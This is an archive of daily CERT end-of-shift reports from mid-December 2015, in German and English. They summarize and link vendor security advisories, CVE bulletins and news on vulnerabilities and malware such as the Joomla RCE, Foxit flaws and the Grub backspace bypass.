http://www.ibm.com/support/docview.wss?uid=swg21967131 --------------------------------------------- *** IBM InfoSphere Balanced Warehouse C3000, C4000, IBM Smart Analytics System 1050, 2050 and 5710 are affected by multiple vulnerabilities in OpenSSL *** http://www.ibm.com/support/docview.wss?uid=swg21971298 --------------------------------------------- *** Multiple vulnerabilities in current releases of IBM SDK for Node.js in IBM Bluemix *** http://www.ibm.com/support/docview.wss?uid=swg21973447 --------------------------------------------- *** Multiple Security Vulnerabilities affect IBM Security Privileged Identity Manager Virtual Appliance *** http://www.ibm.com/support/docview.wss?uid=swg21972496 --------------------------------------------- *** Multiple vulnerabilities in IBM Java SDK affect Rational Functional Tester (CVE-2015-4872, CVE-2015-4734, CVE-2015-5006) *** http://www.ibm.com/support/docview.wss?uid=swg21972844 --------------------------------------------- *** A vulnerability in lighttpd affects IBM Security Virtual Server Protection for VMware (CVE-2015-3200) *** http://www.ibm.com/support/docview.wss?uid=swg21973291 --------------------------------------------- *** IBM Multiple vulnerabilities in IBM Java SDK affect IBM API Management *** http://www.ibm.com/support/docview.wss?uid=swg21972828 --------------------------------------------- *** Citrix XenServer Multiple Security Updates *** --------------------------------------------- A number of security vulnerabilities have been identified in Citrix XenServer that could, in certain configurations, allow a malicious administrator of a guest VM to compromise the host or obtain potentially sensitive information from other guest VMs. In addition, a vulnerability has been identified that would allow certain applications running on a guest to cause that guest to crash. --------------------------------------------- https://support.citrix.com/article/CTX203879 *** Vuln: Microsoft Windows Environment Variable Expansion in PATH Security Bypass Weakness *** --------------------------------------------- http://www.securityfocus.com/bid/44484 *** Cisco IOS and IOS XE Software IKEv1 State Machine Denial of Service Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** SSA-472334 (Last Update 2015-12-18): NTP Vulnerabilities in RUGGEDCOM ROX-based Devices *** --------------------------------------------- https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-472334… *** SSA-396873 (Last Update 2015-12-18): TLS Vulnerability in Ruggedcom ROS- and ROX-based Devices *** --------------------------------------------- https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-396873… *** iOS banking apps security still not good enough, says researcher *** --------------------------------------------- Repeat test throws up improved results from 2013 but problems remain The security of mobile banking apps has improved over the .. --------------------------------------------- www.theregister.co.uk/2015/12/18/ios_banking_app_audit/

1 0

Tageszusammenfassung - Donnerstag 17-12-2015
by Daily end-of-shift report 17 Dec '15

17 Dec '15

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 16-12-2015 18:00 − Donnerstag 17-12-2015 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Press Backspace 28 times to own unlucky Grub-by Linux boxes *** --------------------------------------------- Integer underflow fault means you can get into rescue mode and rummage around A pair of researchers from the University of Valencias Cybersecurity research group have found that if you press backspace 28 times, its possible to bypass authentication during boot-up on some Linux machines. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2015/12/17/press_backs… *** Checklist - How to Secure Your WordPress Website *** --------------------------------------------- We know that you care about what you build and protecting it is incredibly important. Hacks happen, and it's your job to reduce their likelihood to the lowest probability possible. We built this checklist of best practices to help you harden your website and protect you and your users from hacks. --------------------------------------------- https://www.wordfence.com/learn/checklist-how-to-secure-your-wordpress-webs… *** Privileged Access Workstations *** --------------------------------------------- Privileged Access Workstations (PAWs) provide a dedicated operating system for sensitive tasks that is protected from Internet attacks and threat vectors. Separating these sensitive tasks and accounts from the daily use workstations and devices provides very strong protection from phishing attacks, application and OS vulnerabilities, various impersonation attacks, and credential theft attacks such as keystroke logging, Pass-the-Hash, and Pass-The-Ticket. --------------------------------------------- https://technet.microsoft.com/en-US/library/mt634654.aspx *** F-Secure: Sandboxed Execution Environment *** --------------------------------------------- Sandboxed Execution Environment (SEE) is a framework for building test automation in secured Environments. The Sandboxes, provided via libvirt, are customizable allowing high degree of flexibility. Different type of Hypervisors (Qemu, VirtualBox, LXC) can be employed to run the Test Environments. Plugins can be added to a Test Environment which provides an Event mechanism synchronisation for their interaction. Users can enable and configure the plugins through a JSON configuration file. --------------------------------------------- https://github.com/F-Secure/see *** How do you know if your smartphone has been compromised? *** --------------------------------------------- Signs that may indicate a mobile infection: Has your phone been compromised? #1: You notice the system or apps behaving strangely #2: Your call or message history includes some unknown entries ... --------------------------------------------- http://www.welivesecurity.com/2015/12/16/know-smartphone-compromised/ *** XSS, SQLi bugs found in several Network Management Systems *** --------------------------------------------- Network Management System (NMS) offerings by Spiceworks, Ipswitch, Opsview and Castle Rock Computing have been found sporting several cross-site scripting and SQL injection flaws that could be exploit... --------------------------------------------- http://feedproxy.google.com/~r/HelpNetSecurity/~3/hQ6oQHF5luA/secworld.php *** POS Malware Families: An insight into the Behavior of POS Malware *** --------------------------------------------- In a previous blog, we discussed why Point of Sale (POS) devices remain such an attractive target and described some different attack methods. As you can see from the infographic below, retail and POS have been (pardon the pun) "Targets" on an ongoing basis for the past few years, and the trend doesn't appear to be reversing, even with technologies such as EMV and P2PE. In this blog, we describe some of the different families of POS malware. POS Malware Common Features... --------------------------------------------- https://feeds.feedblitz.com/~/128665939/0/alienvault-blogs~POS-Malware-Fami… *** Xen Security Advisories *** --------------------------------------------- XSA-155 - paravirtualized drivers incautious about shared memory contents http://xenbits.xen.org/xsa/advisory-155.html --------------------------------------------- XSA-157 - Linux pciback missing sanity checks leading to crash http://xenbits.xen.org/xsa/advisory-157.html --------------------------------------------- XSA-164 - qemu-dm buffer overrun in MSI-X handling http://xenbits.xen.org/xsa/advisory-164.html --------------------------------------------- XSA-165 - information leak in legacy x86 FPU/XMM initialization http://xenbits.xen.org/xsa/advisory-165.html --------------------------------------------- XSA-166 - ioreq handling possibly susceptible to multiple read issue http://xenbits.xen.org/xsa/advisory-166.html --------------------------------------------- *** DFN-CERT-2015-1948: Samba: Mehrere Schwachstellen ermöglichen u.a. das Umgehen von Sicherheitsvorkehrungen *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2015-1948/ *** Cisco FireSIGHT Management Center SSL HTTP Attack Detection Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Security Advisory: BIND vulnerability CVE-2015-8000 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/34/sol34250741.html?… *** Multiple SQL Injection Vulnerabilities in Citrix Command Center Web User Interface Java Servlets *** --------------------------------------------- A number of SQL Injection vulnerabilities have been identified in the Administration Web UI servlets used by Citrix Command Center. These vulnerabilities, if exploited, could allow an authenticated user to insert malicious SQL queries into the application, potentially causing the alteration or deletion of system data. --------------------------------------------- http://support.citrix.com/article/CTX203787 *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM API Management (CVE-2015-1788) *** http://www.ibm.com/support/docview.wss?uid=swg21965259 --------------------------------------------- *** IBM Security Bulletin: Fix available for Information Disclosure Vulnerability in IBM WebSphere Portal (CVE-2015-7447) *** http://www.ibm.com/support/docview.wss?uid=swg21973152 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in Apache Commons affects IBM Content Manager Services for Lotus Quickr (CVE-2015-7450) *** http://www.ibm.com/support/docview.wss?uid=swg21973096 --------------------------------------------- *** IBM Security Bulletin: Tivoli Storage Manager for Virtual Environments: Data Protection for VMware and Tivoli Storage FlashCopy Manager for VMware affected by privilege escalation vulnerability (CVE-2015-7429) *** http://www.ibm.com/support/docview.wss?uid=swg21973087 --------------------------------------------- *** IBM Security Bulletin: Tivoli Storage Manager for Virtual Environments: Data Protection for VMware and Tivoli Storage FlashCopy Manager for VMware affected by unauthorized access vulnerability (CVE-2015-7420) *** http://www.ibm.com/support/docview.wss?uid=swg21973086 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli Application Dependency Discovery Manager (TADDM) - IBM Java SDK updates October 2015 *** http://www.ibm.com/support/docview.wss?uid=swg21973355 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM HTTP Server (IHS) affect IBM Security SiteProtector System (CVE-2015-1283, CVE-2015-3183 and CVE-2015-4947) *** http://www.ibm.com/support/docview.wss?uid=swg21972470 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in OpenSSL affects IBM Content Collector for SAP Applications (CVE-2015-1788) *** http://www.ibm.com/support/docview.wss?uid=swg21973147 --------------------------------------------- *** IBM Security Bulletin: IBM PowerVC is impacted by OpenStack Cinder information disclosure vulneraility (CVE-2015-1851) *** http://www.ibm.com/support/docview.wss?uid=nas8N1020980 --------------------------------------------- *** IBM Security Bulletin: Infosphere BigInsights is affected by a vulnerability in DB2 that allows users to truncate any table even though the owner of the table has not granted any privilege to any user/role/group (CVE-2015-5020) *** http://www.ibm.com/support/docview.wss?uid=swg21967923 --------------------------------------------- *** IBM Security Bulletin: Infosphere BigInsights is affected by a vulnerability in DB2 (CVE-2015-1788) *** http://www.ibm.com/support/docview.wss?uid=swg21970400 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in Apache Commons affects OpenPages GRC Platform with Application Server (CVE-2015-7450) *** http://www.ibm.com/support/docview.wss?uid=swg21972345 --------------------------------------------- *** IBM Security Bulletin: IBM Curam Social Program Management is Vulnerable to Reflected Cross-Site Scripting (CVE-2015-7402) *** http://www.ibm.com/support/docview.wss?uid=swg21970661 --------------------------------------------- *** ZDI-15-641: Foxit Reader Forms Out-Of-Bounds Read Remote Code Execution Vulnerability *** --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. --------------------------------------------- http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/LfsseiLCccs/ *** ZDI-15-643: Foxit Reader Will Print Action Use-After-Free Remote Code Execution Vulnerability *** --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. --------------------------------------------- http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/28dKwkM6_5M/ *** ZDI-15-642: Foxit Reader Will Save Document Action Use-After-Free Remote Code Execution Vulnerability *** --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. --------------------------------------------- http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/uY-c98zZjQI/ *** ZDI-15-644: Foxit Reader FlateDecode Heap Buffer Overflow Remote Code Execution Vulnerability *** --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. --------------------------------------------- http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/s3waojIPu0E/

1 0

Tageszusammenfassung - Mittwoch 16-12-2015
by Daily end-of-shift report 16 Dec '15

16 Dec '15

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 15-12-2015 18:00 − Mittwoch 16-12-2015 18:00 Handler: Stephan Richter Co-Handler: Alexander Riepl *** IBM Security Bulletin *** --------------------------------------------- *** Multiple vulnerabilities in IBM Java SDK affect IBM Rational Connector for SAP Solution Manager *** http://www.ibm.com/support/docview.wss?uid=swg21967447 --------------------------------------------- *** IBM Security Bulletin: Security Vulnerability in IBM WebSphere Application Server shipped with IBM Tivoli Netcool Configuration Manager *** http://www.ibm.com/support/docview.wss?uid=swg21972884 --------------------------------------------- *** IBM Security Bulletin: Openstack Cinder and Horizon vulnerabilities affect IBM Cloud Manager with OpenStack *** http://www.ibm.com/support/docview.wss?uid=isg3T1023146 --------------------------------------------- *** IBM Security Bulletin: IBM QRadar SIEM is vulnerable to path traversal attack. *** http://www.ibm.com/support/docview.wss?uid=swg21967647 --------------------------------------------- *** IBM Security Bulletin: A security vulnerability exist in the IBM SDK, Java Technology Edition provided with WebSphere DataPower XC10 Appliance *** http://www.ibm.com/support/docview.wss?uid=swg21972660 --------------------------------------------- *** IBM Security Bulletin: IBM QRadar SIEM is vulnerable to Stored cross-site scripting. *** http://www.ibm.com/support/docview.wss?uid=swg21973175 --------------------------------------------- *** FireEye Exploitation: Project Zero's Vulnerability of the Beast *** --------------------------------------------- FireEye sell security appliances to enterprise and government customers. FireEye's flagship products are monitoring devices designed to be installed at egress points of large networks, i.e. where traffic flows from the intranet to the internet.To give a .. --------------------------------------------- http://googleprojectzero.blogspot.com/2015/12/fireeye-exploitation-project-… *** Security Management vs Chaos: Understanding the Butterfly Effect to Manage Outcomes & Reduce Chaos *** --------------------------------------------- And now for something completely different.">Python">Subtitle: Captain Obvious Applies Chaos Theory Introduction This diary breaks a bit from our expected norms todiscussmanaging possible outcomes originating froma data breach .. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20495 *** Security Advisory: Multiple MySQL vulnerabilities *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/59/sol59010802.html?… *** VB2015 video: Making a dent in Russian mobile banking phishing *** --------------------------------------------- Sebastian Porst explains what Google has done to protect users from phishing apps targeting Russian banks.In the last few years, mobile malware has evolved from a mostly theoretical threat to a very serious one that affects many users. Indeed, several talks at VB2015 dealt with various aspects of mobile .. --------------------------------------------- http://www.virusbtn.com/blog/2015/12_16.xml *** Adcon Telemetry A840 Vulnerabilities *** --------------------------------------------- This advisory contains mitigation details for vulnerabilities in Adcon Telemetry's A840 Telemetry Gateway Base Station. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-15-349-01 *** Advantech EKI Vulnerabilities (Update A) *** --------------------------------------------- This updated advisory is a follow-up to the original advisory titled ICSA-15-344-01 Advantech EKI Vulnerabilities that was published December 10, 2015, on the NCCIC/ICS-CERT web site. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-15-344-01 *** Sicherheitspaket UTM von Sophos löchrig *** --------------------------------------------- Das Unified-Threat-Management-Paket von Sophos ist bedroht und einem Sicherheitsforscher zufolge können Angreifer etwa die Firewall deaktivieren. Die Lücken sollen bereits gefixt sein; Patches sind aber noch nicht verfügbar. --------------------------------------------- http://heise.de/-3044717 *** DFN-CERT-2015-1937/">ISC BIND9: Zwei Schwachstellen ermöglichen einen Denial-of-Service-Angriff *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2015-1937/ *** Driving an industry towards secure code *** --------------------------------------------- The German government made an unprecedented move this week by issuing requirements for all new vehicles' software to be made accessible to country regulators to ensure that emissions loopholes aren't ... --------------------------------------------- http://www.net-security.org/article.php?id=2431 *** Playing With Sandboxes Like a Boss *** --------------------------------------------- Last week, Guy wrote a nice diary to explain how to easily deploy IRMA to analyze suspicious files. Having a good tool to work on files locally is always interesting for multiple reasons. You are doing some independent research, you .. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20501 *** Attacking WPA2 Enterprise *** --------------------------------------------- The widespread use of mobile and portable devices in the enterprise environment requires a proper implementation of the wireless network infrastructure to provide them connectivity and ensure the business functionality. WPA-Enterprise is .. --------------------------------------------- http://resources.infosecinstitute.com/attacking-wpa2-enterprise/ *** Open Source Network Security Tools for Newbies *** --------------------------------------------- With so many open source tools available to help with network security, it can be tricky to figure out where to start, especially if you are an IT generalist who has been tasked with security. We all have to start somewhere. The question is, where? The sheer number of open source tools available can make .. --------------------------------------------- https://www.alienvault.com/blogs/security-essentials/open-source-network-se… *** [HTB23282]: RCE in Zen Cart via Arbitrary File Inclusion *** --------------------------------------------- High-Tech Bridge Security Research Lab discovered critical vulnerability in a popular e-commerce software Zen Cart, which can be exploited by remote non-authenticated attackers to compromise vulnerable system. A remote .. --------------------------------------------- https://www.htbridge.com/advisory/HTB23282 *** Crimeware / APT Malware Masquerade as Santa Claus and Christmas Apps *** --------------------------------------------- CloudSek was monitoring an underground hacking team, that was selling a Desktop malware in various underground forums. The desktop malware is specifically designed for jumping air-gapped systems , and given the type of documents the attackers are seeking , it was collecting classified data from software companies and government organisations. --------------------------------------------- https://www.cloudsek.com/announcements/blog/apt-malware-masquerade-as-chris…

1 0

Tageszusammenfassung - Dienstag 15-12-2015
by Daily end-of-shift report 15 Dec '15

15 Dec '15

======================= = End-of-Shift report = ======================= Timeframe: Montag 14-12-2015 18:00 − Dienstag 15-12-2015 18:00 Handler: Stephan Richter Co-Handler: n/a *** 13 million MacKeeper users exposed after MongoDB door was left open *** --------------------------------------------- Expect more breaches in the future as 35,000 MongoDB installs are misconfigured. --------------------------------------------- http://arstechnica.com/security/2015/12/13-million-mackeeper-users-exposed-… *** Hack: Esa-Nutzer haben kurze Passwörter *** --------------------------------------------- Zahlreiche interne Datensätze der Europäischen Raumfahrtagentur Esa sind gehackt worden und jetzt im Internet einsehbar. Offenbar benutzen viele der Esa-Nutzer kurze und unsichere Passwörter. --------------------------------------------- http://www.golem.de/news/rocket-science-esa-nutzer-haben-kurze-passwoerter-… *** Vulnerability Details: Joomla! Remote Code Execution *** --------------------------------------------- The Joomla! team released a new version of Joomla! CMS yesterday to patch a serious and easy to exploit remote code execution vulnerability that affected pretty much all versions of the platform up to 3.4.5. As soon as the patch was released, we were able to start our investigation and found that it was alreadyRead More The post Vulnerability Details: Joomla! Remote Code Execution appeared first on Sucuri Blog. --------------------------------------------- https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.ht… *** 4 Things to Consider When Assessing Device Posture for Effective Network Access Control *** --------------------------------------------- Guest blogger Benny Czarny explains one of the main reasons to have a NAC system in place is to keep risky devices from connecting to your organization's network. Unfortunately, simply purchasing a NAC solution is not going to guarantee your protection.Categories: Online SecurityTags: Anti-Malwareanti-virusencryptionendpointvulnerability(Read more...) --------------------------------------------- https://blog.malwarebytes.org/online-security/2015/12/4-things-to-consider-… *** Protecting Windows Networks - Kerberos Attacks *** --------------------------------------------- MEDIA NOTE: This is not a new flaw, just a good write-up! I don't know why media reporting this as a new flaw. | Kerberos is an authentication protocol that is used by default in Windows networks and provide mutual authentication and authorization for clients and servers. It does not require you to send a password or a hash on the wire, it is instead rely on a trusted third party for handling all the details. | Although, it is considered a secure protocol, it has some flaws in Windows... --------------------------------------------- http://dfir-blog.com/2015/12/13/protecting-windows-networks-kerberos-attack… *** Kaspersky Security Bulletin 2015. Overall statistics for 2015 *** --------------------------------------------- In 2015, virus writers demonstrated a particular interest in exploits for Adobe Flash Player. The proportion of relatively simple programs used in mass attacks was growing. Attackers have mastered non-Windows platforms - Android and Linux: almost all types of malicious programs are created and used for these platforms. --------------------------------------------- http://securelist.com/analysis/kaspersky-security-bulletin/73038/kaspersky-… *** Oil and Gas Cyber Security - Interview *** --------------------------------------------- In the recent presentation at BlackHat, you mentioned that oil and gas is one of the industries most plagued by cyber-attacks. What makes oil and gas an attractive target? It's a juicy target for Cyberattacks as oil and gas companies are responsible for a great part of some countries' economies. Any interference in their work... --------------------------------------------- http://resources.infosecinstitute.com/oil-and-gas-cyber-security-interview/ *** Android.ZBot banking Trojan uses "web injections" to steal confidential data *** --------------------------------------------- December 15, 2015 The Trojans designed to steal money from bank accounts pose a serious threat to Android users. The Android.ZBot Trojan is one of these malicious programs. Its different modifications target mobile devices of Russian users from February 2015. This Trojan is interesting due to its ability to steal logins, passwords, and other confidential data by displaying fraudulent authentication forms on top of any applications. The appearance of such forms is generated on --------------------------------------------- http://news.drweb.com/show/?i=9754&lng=en&c=9 *** Security Afterworks: Wie man TLS-Hipster wird & Best of CCC *** --------------------------------------------- January 21, 2016 - 5:00 pm - 6:00 pm SBA Research Favoritenstraße 16 1040 Wien --------------------------------------------- https://www.sba-research.org/events/security-afterworks-wie-man-tls-hipster… *** ZDI-15-639: (0Day) Microsoft Office Excel Binary Worksheet Use-After-Free Remote Code Execution Vulnerability *** --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Office Excel. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-15-639/ *** ZDI-15-638: (0Day) Apache TomEE Deserialization of Untrusted Data Remote Code Execution Vulnerability *** --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apache TomEE. Authentication is not required to exploit this vulnerability. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-15-638/ *** Security Advisory: RSA-CRT key leak vulnerability CVE-2015-5738 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/91/sol91245485.html?… *** Cisco Unified Communications Manager Web Management Interface Cross-Site Scripting Filter Bypass Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco IOS XE Software IPv6 Neighbor Discovery Denial of Service Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco Unified Communications Manager Web Applications Identity Management Subsystem Denial of Service Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Security Notice - Statement on NTP.org and CERT/CC Revealing Security Vulnerabilities in NTPd *** --------------------------------------------- http://www.huawei.com/en/security/psirt/security-bulletins/security-notices… *** TYPO3 CMS 6.2.16 and 7.6.1 released *** --------------------------------------------- The TYPO3 Community announces the versions 6.2.16 LTS and 7.6.1 LTS of the TYPO3 Enterprise Content Management System. Both versions are maintenance releases and contain bug and security fixes. In case the extension mediace is used, please make sure to upgrade to version 7.6.1. --------------------------------------------- http://www.typo3.org/news/article/typo3-cms-6216-and-761-released/ --------------------------------------------- *** Cross-Site Scripting in TYPO3 component Indexed Search *** http://www.typo3.org/news/article/cross-site-scripting-in-typo3-component-i… --------------------------------------------- *** TYPO3 is susceptible to Cross-Site Flashing *** http://www.typo3.org/news/article/typo3-is-susceptible-to-cross-site-flashi… --------------------------------------------- *** Multiple Cross-Site Scripting vulnerabilities in frontend *** http://www.typo3.org/news/article/multiple-cross-site-scripting-vulnerabili… --------------------------------------------- *** Cross-Site Scripting vulnerability in typolinks *** http://www.typo3.org/news/article/cross-site-scripting-vulnerability-in-typ… --------------------------------------------- *** Multiple Cross-Site Scripting vulnerabilities in TYPO3 backend *** http://www.typo3.org/news/article/multiple-cross-site-scripting-vulnerabili… --------------------------------------------- *** Cross-Site Scripting in TYPO3 component Extension Manager *** http://www.typo3.org/news/article/cross-site-scripting-in-typo3-component-e… ---------------------------------------------

1 0

Tageszusammenfassung - Montag 14-12-2015
by Daily end-of-shift report 14 Dec '15

14 Dec '15

======================= = End-of-Shift report = ======================= Timeframe: Freitag 11-12-2015 18:00 − Montag 14-12-2015 18:00 Handler: Stephan Richter Co-Handler: Alexander Riepl *** IBM Security Bulletin *** --------------------------------------------- *** Vulnerability in Apache Commons affects WebSphere Message Broker and IBM Integration Bus (CVE-2015-7450) *** http://www.ibm.com/support/docview.wss?uid=swg21972391 --------------------------------------------- ***Vulnerability in Apache Commons affects Tivoli Network Manager Transmission Edition (CVE-2015-7450) *** http://www.ibm.com/support/docview.wss?uid=swg21971891 --------------------------------------------- ***Vulnerability in Apache Commons affects Rational Developer for System z (CVE-2015-7450) *** http://www.ibm.com/support/docview.wss?uid=swg21971643 --------------------------------------------- ***Vulnerability in the IBM Installation Manager script (CVE-2015-7442) *** http://www.ibm.com/support/docview.wss?uid=swg21971295 --------------------------------------------- ***Vulnerability in Apache Commons affects Rational Software Architect, Rational Software Architect for WebSphere Software and Rational Software Architect RealTime (CVE-2015-7450) *** http://www.ibm.com/support/docview.wss?uid=swg21972753 --------------------------------------------- ***Vulnerabilities in OpenSSL affect IBM Rational Application Developer for WebSphere Software (CVE-2015-3193, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196, CVE-2015-1794) *** http://www.ibm.com/support/docview.wss?uid=swg21972951 --------------------------------------------- ***A security vulnerability has been identified in IBM Maximo Asset Management which could allow an attacker to obtain sensitive information via REST API (CVE-2015-7452) *** http://www.ibm.com/support/docview.wss?uid=swg21972463 --------------------------------------------- ***IBM Maximo Asset Management is vulnerable to cross-site scripting, caused by improper validation of user-supplied input (CVE-2015-7451) *** http://www.ibm.com/support/docview.wss?uid=swg21972423 --------------------------------------------- ***IBM Security Network Intrusion Prevention System is affected by krb5 vulnerabilities (CVE-2014-4341, CVE-2013-1418 ) *** http://www.ibm.com/support/docview.wss?uid=swg21970321 --------------------------------------------- ***A vulnerability in OpenSSH affects IBM Security Network Intrusion Prevention System (CVE-2015-5600) *** http://www.ibm.com/support/docview.wss?uid=swg21969673 --------------------------------------------- ***A vulnerability in net-snmp affects IBM Security Network Intrusion Prevention System (CVE-2014-3565) *** http://www.ibm.com/support/docview.wss?uid=swg21972208 --------------------------------------------- ***Vulnerabilities in curl affect IBM Security Network Intrusion Prevention System *** http://www.ibm.com/support/docview.wss?uid=swg21968978 --------------------------------------------- ***A security vulnerability has been identified in IBM Rational ClearQuest (CVE-2015-4996) *** http://www.ibm.com/support/docview.wss?uid=swg21972331 --------------------------------------------- ***Multiple vulnerabilities in IBM Java Runtime affect IBM Tivoli Provisioning Manager (CVE-2015-2601, CVE-2015-1931, CVE-2015-2625) *** http://www.ibm.com/support/docview.wss?uid=swg21972941 --------------------------------------------- ***Vulnerabilities in OpenSSL affect IBM Cognos Planning(CVE-2015-1789, CVE-2015-1790, CVE-2015-1792) *** http://www.ibm.com/support/docview.wss?uid=swg21971729 --------------------------------------------- *** Website Malware - Evolution of Pseudo Darkleech *** --------------------------------------------- Last March we described a WordPress attack that was responsible for hidden iframe injections that resembled Darkleech injections: declarations of styles with random names and coordinates, iframes with No-IP host names, and random dimensions where the .. --------------------------------------------- https://blog.sucuri.net/2015/12/evolution-of-pseudo-darkleech.html *** iTunes 12.3.2 *** --------------------------------------------- https://support.apple.com/kb/HT205636 *** Security Advisory: Apache Groovy vulnerability CVE-2015-3253 *** --------------------------------------------- The MethodClosure class in runtime/MethodClosure.java in Apache Groovy 1.7.0 through 2.4.3 allows remote attackers to execute arbitrary code or cause a denial of service via a crafted serialized object. (CVE-2015-3253) --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/49/sol49233165.html *** Security Update 2015-006 Yosemite *** --------------------------------------------- https://support.apple.com/kb/HT205653 *** OS X El Capitan 10.11.2, Security Update 2015-005 Yosemite, and Security Update 2015-008 Mavericks *** --------------------------------------------- https://support.apple.com/kb/HT205637 *** OS X El Capitan 10.11.1, Security Update 2015-004 Yosemite, and Security Update 2015-007 Mavericks *** --------------------------------------------- https://support.apple.com/kb/HT205375 *** What Signs Are You Missing? *** --------------------------------------------- While recently listening to a presentation, I found my attention drawn to a metal water container at the center of the conference room table. Condensation was all around it and without ever having to interact with the container, I found .. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20481 *** Google Bans Symantec Root Certificates *** --------------------------------------------- An anonymous reader writes: After in September Google discovered SSL certificates issued in its name by Symantec, and after in October the company discovered over 2,500 .. --------------------------------------------- http://tech.slashdot.org/story/15/12/12/2255212/google-bans-symantec-root-c… *** DSA-3416 libphp-phpmailer - security update *** --------------------------------------------- Takeshi Terada discovered a vulnerability in PHPMailer, a PHP library foremail transfer, used by many CMSs. The library accepted email addressesand SMTP commands containing line breaks, which can be abused by anattacker to inject messages. --------------------------------------------- https://www.debian.org/security/2015/dsa-3416 *** Memory-resident modular malware menaces moneymen *** --------------------------------------------- Latentbot avoids your HDD - and its been off the radar for two years A stealthy strain of malware resident only in memory has been quietly pwning victims around the world for two years. --------------------------------------------- www.theregister.co.uk/2015/12/14/latentbot_memory_resident_malware/ *** Lenovo/CSR: Bluetooth-Treiber installiert Root-Zertifikat *** --------------------------------------------- Ein Bluetooth-Treiber für Chips der Firma CSR installiert zwei Root-Zertifikate, mit denen der Besitzer des privaten Schlüssels HTTPS-Verbindungen angreifen könnte. Offenbar handelt es sich um Testzertifikate zur Treibersignierung während der Entwicklung. --------------------------------------------- http://www.golem.de/news/lenovo-csr-bluetooth-treiber-installiert-root-zert… *** Inside the German cybercriminal underground *** --------------------------------------------- Trend Micro investigated on German crime forums and concluded that Germany possesses the most advanced cybercrime ecosystem in the European Union. We have reported several times the news related to various criminal cybercriminal .. --------------------------------------------- http://securityaffairs.co/wordpress/42802/cyber-crime/german-cybercriminal-… *** [20151214] - Core - Remote Code Execution Vulnerability *** --------------------------------------------- Browser information are not filtered properly while saving the session values into the database what leads to a Remote Code Execution vulnerability. --------------------------------------------- https://developer.joomla.org/security-centre/630-20151214-core-remote-code-… *** [20151214] - Core - CSRF Hardening *** --------------------------------------------- Add additional CSRF hardening in com_templates. --------------------------------------------- https://developer.joomla.org/security-centre/633-20151214-core-csrf-hardeni… *** [20151214] - Core - Directory Traversal *** --------------------------------------------- Fails to properly sanitise input data from the XML install file located within the package archive. --------------------------------------------- https://developer.joomla.org/security-centre/634-20151214-core-directory-tr… *** Bugtraq: ERPSCAN Research Advisory [ERPSCAN-15-022] SAP NetWeaver 7.4 - XSS *** --------------------------------------------- http://www.securityfocus.com/archive/1/537111 *** Bugtraq: [ERPSCAN-15-021] SAP NetWeaver 7.4 - SQL Injection vulnerability *** --------------------------------------------- http://www.securityfocus.com/archive/1/537109 *** Sicherheitsforscher: Datenleck bei Mackeeper erlaubt freien Zugriff auf Nutzerdaten *** --------------------------------------------- Die Datenbank der umstrittetenen Mac-Software Mackeeper sei frei zugänglich, erklärt ein Sicherheitsforscher. Er habe 13 Millionen Datensätze mit Nutzerinformationen ungehindert heruntergeladen. --------------------------------------------- http://heise.de/-3043720

1 0

2026

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

Daily